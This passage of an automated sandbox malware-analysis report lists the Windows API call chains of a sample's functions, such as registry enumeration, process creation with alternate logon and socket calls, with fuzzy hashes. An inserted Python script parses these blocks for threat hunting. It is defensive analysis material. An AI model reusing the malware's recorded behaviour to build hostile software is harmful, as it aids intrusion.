                                                                                • TerminateThread.KERNEL32(00540050,000001F6), ref: 0064099B
                                                                                • WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 006409A9
                                                                                • CloseHandle.KERNEL32(00540050), ref: 006409B8
                                                                                • InterlockedExchange.KERNEL32(01A2D970,000001F6), ref: 006409C8
                                                                                • LeaveCriticalSection.KERNEL32(01A2D950), ref: 006409CF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 497ad5f7bddf3a3a0d8e786f9a9853f717a71ee28fec9b1868fcab2ec373029b
                                                                                • Instruction ID: 4973f09f1d9045aaadd52d7c2e3e4aad88ef2507802fdf21625e10aee5af7b5a
                                                                                • Opcode Fuzzy Hash: 497ad5f7bddf3a3a0d8e786f9a9853f717a71ee28fec9b1868fcab2ec373029b
                                                                                • Instruction Fuzzy Hash: 9DF03131442D12BBE7415FA5EE9CBE6BB3AFF01712F403015F241508A0C7B5A565DFA0
                                                                                APIs
                                                                                • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00651DC0
                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00651DE1
                                                                                • WSAGetLastError.WSOCK32 ref: 00651DF2
                                                                                • htons.WSOCK32(?), ref: 00651EDB
                                                                                • inet_ntoa.WSOCK32(?), ref: 00651E8C
                                                                                  • Part of subcall function 006339E8: _strlen.LIBCMT ref: 006339F2
                                                                                  • Part of subcall function 00653224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0064EC0C), ref: 00653240
                                                                                • _strlen.LIBCMT ref: 00651F35
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                • String ID:
                                                                                • API String ID: 3203458085-0
                                                                                • Opcode ID: cca45733570ee1748eb45c4c79736413d96d7667356e8081f1050d642ea9b30a
                                                                                • Instruction ID: 2206a73e478aa115bd7841e7721e27dacefba9143b6f053a0bc0de4c9d0f830a
                                                                                • Opcode Fuzzy Hash: cca45733570ee1748eb45c4c79736413d96d7667356e8081f1050d642ea9b30a
                                                                                • Instruction Fuzzy Hash: D4B1BA30204341AFC324DB24C885F6A7BE6AF85318F54894DF8564F3A2DB71ED46CB91
                                                                                APIs
                                                                                • __allrem.LIBCMT ref: 006000BA
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006000D6
                                                                                • __allrem.LIBCMT ref: 006000ED
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0060010B
                                                                                • __allrem.LIBCMT ref: 00600122
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00600140
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 1992179935-0
                                                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                • Instruction ID: 75884bab3b8c0e8edf4ec04036ed9f4b2f71239090f7065925f4a2141c12f4ba
                                                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                • Instruction Fuzzy Hash: DB813772A40B069FE7289F68CC41BAB77EAAF41324F24453EF611D76C1E774D9408B94
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005F82D9,005F82D9,?,?,?,0060644F,00000001,00000001,8BE85006), ref: 00606258
                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0060644F,00000001,00000001,8BE85006,?,?,?), ref: 006062DE
                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006063D8
                                                                                • __freea.LIBCMT ref: 006063E5
                                                                                  • Part of subcall function 00603820: RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                • __freea.LIBCMT ref: 006063EE
                                                                                • __freea.LIBCMT ref: 00606413
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: 21d3b4a9e16cebaeb8eedf801d85fff8d9a64886020311cb7ef4e77e57a8ef20
                                                                                • Instruction ID: 6d2943e95dfc5038bc7e044ba294043cd2c4d1d3a3885e5c0ad3ae736adde8fe
                                                                                • Opcode Fuzzy Hash: 21d3b4a9e16cebaeb8eedf801d85fff8d9a64886020311cb7ef4e77e57a8ef20
                                                                                • Instruction Fuzzy Hash: FF51B072640216ABDB2D8F64CC81EEF77ABEF44750F144629F805DA2C0EB34DD61C6A0
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065C9F1
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA68
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065BCCA
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065BD25
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065BD6A
                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0065BD99
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0065BDF3
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065BDFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                • String ID:
                                                                                • API String ID: 1120388591-0
                                                                                • Opcode ID: 8b873298e1c26606b2389e774da672e15929f96fb27a597d67992834816b874d
                                                                                • Instruction ID: 90717f580070b5087ecc495569b5793ab5a77f6dd27b7b05b68a0a3dcbd5b646
                                                                                • Opcode Fuzzy Hash: 8b873298e1c26606b2389e774da672e15929f96fb27a597d67992834816b874d
                                                                                • Instruction Fuzzy Hash: BA818E30208241AFD714DF24C895E6ABBF6FF84348F14955DF8954B2A2DB32ED49CB92
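                                                                                 The function blocks above (the thread-termination block with TerminateThread / WaitForSingleObject / CloseHandle and the registry block with RegConnectRegistryW / RegOpenKeyExW / RegEnumValueW) are the unit an analyst pivots on: the direct call chain says what the function does, and the Instruction Fuzzy Hash lets the same function be found in other reports. The script below is an added example and is not code from the Joe Sandbox report or its IDA plugin; it parses this listing format into call chains and similarity fields, then hunts for an ordered API sequence. EXCERPT is copied from this report's own lines (page indentation and the Memory Dump Source lines removed); the function names parse_report, direct_chain, has_sequence and hunt are this example's own.

```python
"""Parse Joe Sandbox IDA-plugin function blocks (the listing format of this
report) into API call chains plus similarity hashes, then hunt for an ordered
call sequence across blocks.  Added example, not the report's own code;
EXCERPT is copied from this report's listing with indentation stripped."""
import re

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# API line: optional "Part of subcall function XXXXXXXX:" prefix, then Name.MODULE,
# an optional "(arg,arg,...)" list, then "ref: <call-site address>".
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s+)?"
    r"(?P<callee>[^\s(]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^•\s+(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• Opcode ID: ..." style lines


def parse_report(text: str) -> list:
    """Split the listing into function blocks; every block starts at an 'APIs' header."""
    blocks, block, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                block = {"apis": [], "strings": [], "meta": {}}
                blocks.append(block)
            section = line
            continue
        if block is None:                 # text before the first function block
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                continue
            name, dot, module = m["callee"].rpartition(".")
            if not dot:                   # no module suffix: keep the name, mark module unknown
                name, module = module, "?"
            block["apis"].append({
                "name": name, "module": module,
                "args": m["args"].split(",") if m["args"] is not None else [],
                "ref": m["ref"].upper(),
                "subcall": m["sub"].upper() if m["sub"] else None,   # call sits inside a callee
            })
        elif section == "Strings":        # "• <string>, xrefs: ADDR[,ADDR]"
            body, sep, xrefs = line.lstrip("• ").rpartition(", xrefs: ")
            if not sep:
                body, xrefs = xrefs, ""
            block["strings"].append({"value": body, "xrefs": xrefs.split(",") if xrefs else []})
        else:
            m = KV_RE.match(line)
            if m:                         # first value wins, so 'Associated' keeps its first dump
                block["meta"].setdefault(m["key"].strip(), m["val"].strip())
    return blocks


def direct_chain(block: dict) -> list:
    """Calls made by the function itself (subcall entries dropped), ordered by call-site address."""
    own = [a for a in block["apis"] if a["subcall"] is None]
    return [a["name"] for a in sorted(own, key=lambda a: int(a["ref"], 16))]


def has_sequence(block: dict, pattern: list) -> bool:
    """True when `pattern` occurs in the chain as an ordered, not necessarily adjacent, subsequence."""
    it = iter(direct_chain(block))
    return all(any(name == want for name in it) for want in pattern)


def hunt(blocks: list, pattern: list) -> list:
    """Instruction fuzzy hashes of the blocks whose chain matches `pattern` (pivot values for other reports)."""
    return [b["meta"].get("Instruction Fuzzy Hash", "?") for b in blocks if has_sequence(b, pattern)]


EXCERPT = """\
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0063DA74
• LoadStringW.USER32(00000000), ref: 0063DA7B
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0063DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0063DAB9
Similarity
• String ID: %s (%d) : ==> %s: %s %s
• Instruction Fuzzy Hash: 960186F29002087FE7109BA4DD89EF7776DEB08711F405496F746E2141E6B49E844FB4
APIs
• InterlockedExchange.KERNEL32(01A2D970,01A2D970), ref: 0064097B
• EnterCriticalSection.KERNEL32(01A2D950,00000000), ref: 0064098D
• TerminateThread.KERNEL32(00540050,000001F6), ref: 0064099B
• WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 006409A9
• CloseHandle.KERNEL32(00540050), ref: 006409B8
• InterlockedExchange.KERNEL32(01A2D970,000001F6), ref: 006409C8
• LeaveCriticalSection.KERNEL32(01A2D950), ref: 006409CF
Similarity
• String ID:
• Instruction Fuzzy Hash: 9DF03131442D12BBE7415FA5EE9CBE6BB3AFF01712F403015F241508A0C7B5A565DFA0
APIs
  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065BCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065BD25
• RegCloseKey.ADVAPI32(00000000), ref: 0065BD6A
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0065BD99
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0065BDF3
• RegCloseKey.ADVAPI32(?), ref: 0065BDFF
Similarity
• Instruction Fuzzy Hash: BA818E30208241AFD714DF24C895E6ABBF6FF84348F14955DF8954B2A2DB32ED49CB92
"""

if __name__ == "__main__":
    parsed = parse_report(EXCERPT)
    for b in parsed:
        print(" -> ".join(direct_chain(b)))
    print(hunt(parsed, ["TerminateThread", "WaitForSingleObject", "CloseHandle"]))
```

                                                                                 Run it against a saved copy of the full report instead of EXCERPT to list every function whose chain matches a pattern; the WaitForSingleObject argument 000003E8 in the thread block parses to a 1000 ms timeout, and subcall entries are kept on each block but excluded from the chain so that library helpers such as _wcslen do not mask what the function itself calls.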
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000035), ref: 0062F7B9
                                                                                • SysAllocString.OLEAUT32(00000001), ref: 0062F860
                                                                                • VariantCopy.OLEAUT32(0062FA64,00000000), ref: 0062F889
                                                                                • VariantClear.OLEAUT32(0062FA64), ref: 0062F8AD
                                                                                • VariantCopy.OLEAUT32(0062FA64,00000000), ref: 0062F8B1
                                                                                • VariantClear.OLEAUT32(?), ref: 0062F8BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                • String ID:
                                                                                • API String ID: 3859894641-0
                                                                                • Opcode ID: 0c9f5426332adb9f5583ca6dd45e21db4eb306ef774b91018f558cbafa3c69fb
                                                                                • Instruction ID: 7bb365b6bc5c4d5e3b1e8e223da07e336485de1b475d1c2ed98d94b2afc7e056
                                                                                • Opcode Fuzzy Hash: 0c9f5426332adb9f5583ca6dd45e21db4eb306ef774b91018f558cbafa3c69fb
                                                                                • Instruction Fuzzy Hash: 1E51D431A00721BADF24AB65E895B29B7F6EF45310B20947BE805DF291DB708C81CF97
                                                                                APIs
                                                                                  • Part of subcall function 005D7620: _wcslen.LIBCMT ref: 005D7625
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 006494E5
                                                                                • _wcslen.LIBCMT ref: 00649506
                                                                                • _wcslen.LIBCMT ref: 0064952D
                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00649585
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
APIs
  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
• BeginPaint.USER32(?,?,?), ref: 005E9241
• GetWindowRect.USER32(?,?), ref: 005E92A5
• ScreenToClient.USER32(?,?), ref: 005E92C2
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 005E92D3
• EndPaint.USER32(?,?,?,?,?), ref: 005E9321
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006271EA
  • Part of subcall function 005E9339: BeginPath.GDI32(00000000), ref: 005E9357
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID:
• API String ID: 3050599898-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0064080C
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00640847
• EnterCriticalSection.KERNEL32(?), ref: 00640863
• LeaveCriticalSection.KERNEL32(?), ref: 006408DC
• ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006408F3
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00640921
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
• String ID:
• API String ID: 3368777196-0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0062F3AB,00000000,?,?,00000000,?,0062682C,00000004,00000000,00000000), ref: 0066824C
• EnableWindow.USER32(00000000,00000000), ref: 00668272
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 006682D1
• ShowWindow.USER32(00000000,00000004), ref: 006682E5
• EnableWindow.USER32(00000000,00000001), ref: 0066830B
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066832F
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• IsWindowVisible.USER32(?), ref: 00634C95
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00634CB2
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00634CEA
• _wcslen.LIBCMT ref: 00634D08
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00634D10
• _wcsstr.LIBVCRUNTIME ref: 00634D1A
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
APIs
  • Part of subcall function 005D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005D3A97,?,?,005D2E7F,?,?,?,00000000), ref: 005D3AC2
• _wcslen.LIBCMT ref: 0064587B
• CoInitialize.OLE32(00000000), ref: 00645995
• CoCreateInstance.OLE32(0066FCF8,00000000,00000001,0066FB68,?), ref: 006459AE
• CoUninitialize.OLE32 ref: 006459CC
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
APIs
  • Part of subcall function 00630FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00630FCA
  • Part of subcall function 00630FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00630FD6
  • Part of subcall function 00630FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00630FE5
  • Part of subcall function 00630FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00630FEC
  • Part of subcall function 00630FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00631002
• GetLengthSid.ADVAPI32(?,00000000,00631335), ref: 006317AE
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 006317BA
• HeapAlloc.KERNEL32(00000000), ref: 006317C1
• CopySid.ADVAPI32(00000000,00000000,?), ref: 006317DA
• GetProcessHeap.KERNEL32(00000000,00000000,00631335), ref: 006317EE
• HeapFree.KERNEL32(00000000), ref: 006317F5
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
• String ID:
• API String ID: 3008561057-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006314FF
• OpenProcessToken.ADVAPI32(00000000), ref: 00631506
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00631515
• CloseHandle.KERNEL32(00000004), ref: 00631520
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0063154F
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00631563
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
• GetLastError.KERNEL32(?,?,005F3379,005F2FE5), ref: 005F3390
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005F339E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005F33B7
• SetLastError.KERNEL32(00000000,?,005F3379,005F2FE5), ref: 005F3409
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,00605686,00613CD6,?,00000000,?,00605B6A,?,?,?,?,?,005FE6D1,?,00698A48), ref: 00602D78
• _free.LIBCMT ref: 00602DAB
• _free.LIBCMT ref: 00602DD3
• SetLastError.KERNEL32(00000000,?,?,?,?,005FE6D1,?,00698A48,00000010,005D4F4A,?,?,00000000,00613CD6), ref: 00602DE0
• SetLastError.KERNEL32(00000000,?,?,?,?,005FE6D1,?,00698A48,00000010,005D4F4A,?,?,00000000,00613CD6), ref: 00602DEC
• _abort.LIBCMT ref: 00602DF2
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free$_abort
                                                                                • String ID:
                                                                                • API String ID: 3160817290-0
                                                                                • Opcode ID: 50ca94614eb54eee734dd28adaaec77e4e7016253e4d6fa79871b4b07b2c831a
                                                                                • Instruction ID: 4287210a165e0f2145913a9b1312458badbdadb4af0f86d4415fd175c56a0bb7
                                                                                • Opcode Fuzzy Hash: 50ca94614eb54eee734dd28adaaec77e4e7016253e4d6fa79871b4b07b2c831a
                                                                                • Instruction Fuzzy Hash: A9F0F9315C490267C75A37396C2EA5B265FAFC1775B21041DF424923D2EE209C015124
                                                                                APIs
                                                                                  • Part of subcall function 005E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E9693
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96A2
                                                                                  • Part of subcall function 005E9639: BeginPath.GDI32(?), ref: 005E96B9
                                                                                  • Part of subcall function 005E9639: SelectObject.GDI32(?,00000000), ref: 005E96E2
                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00668A4E
                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00668A62
                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00668A70
                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00668A80
                                                                                • EndPath.GDI32(?), ref: 00668A90
                                                                                • StrokePath.GDI32(?), ref: 00668AA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: bdf2a59db21572abf3f5059dea653c1e9c2b8f8d619fe83c7ec9a2e104be0085
                                                                                • Instruction ID: e980d065ddff0869e5fac97efccf76b94fc4620d73ac69acbe524ffe4de40518
                                                                                • Opcode Fuzzy Hash: bdf2a59db21572abf3f5059dea653c1e9c2b8f8d619fe83c7ec9a2e104be0085
                                                                                • Instruction Fuzzy Hash: 7511CC7600014DFFDF119F94DC48EAA7F6EEB09364F048012FA559A161C7729D55DFA0
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00635218
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00635229
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00635230
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00635238
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0063524F
                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00635261
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$Release
                                                                                • String ID:
                                                                                • API String ID: 1035833867-0
                                                                                • Opcode ID: c045e1283cdf79bc20f5b00602b54c727243351bc9bc88674fb179c4ad24f248
                                                                                • Instruction ID: c4a10ce048ac044b2cc8eeef71bd79511d965ebc5b9516b418c403ec1cdf730c
